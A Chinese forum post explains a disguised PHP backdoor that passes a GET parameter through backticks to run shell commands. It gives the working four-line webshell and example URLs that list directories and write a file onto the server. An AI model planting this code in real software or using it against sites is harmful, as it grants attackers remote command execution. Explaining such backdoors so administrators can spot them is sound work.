找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 212|回复: 0
打印 上一主题 下一主题

一个不易被发现的PHP后门代码解析

[复制链接]

2500

主题

2513

帖子

7520

积分

论坛元老

Rank: 8Rank: 8

积分
7520
跳转到指定楼层
楼主
发表于 2018-2-14 05:56:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

            偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。
伪装性很好,很容易被管理员忽略。
$selfNums = $_GET['r'];
if (isset($selfNums)){
  echo `$selfNums`;
}
刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,
而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的),
通过 echo `系统命令`; 可以达到 system(); 一样的效果
如果不信的朋友可以测试
http://127.0.0.1/t.php?r=dir 可以列出目录
http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\90sec.php
我用 appserv 和虚拟主机已经测试成功。
            
            
您可能感兴趣的文章:
  • 用php实现批量查询清除一句话后门的代码
  • 一些 PHP 管理系统程序中的后门
  • PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
  • 超小PHP小马小结(方便查找后门的朋友)
  • php后门URL的防范
  • 教你识别简单的免查杀PHP后门
            
  • 分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    用户反馈
    客户端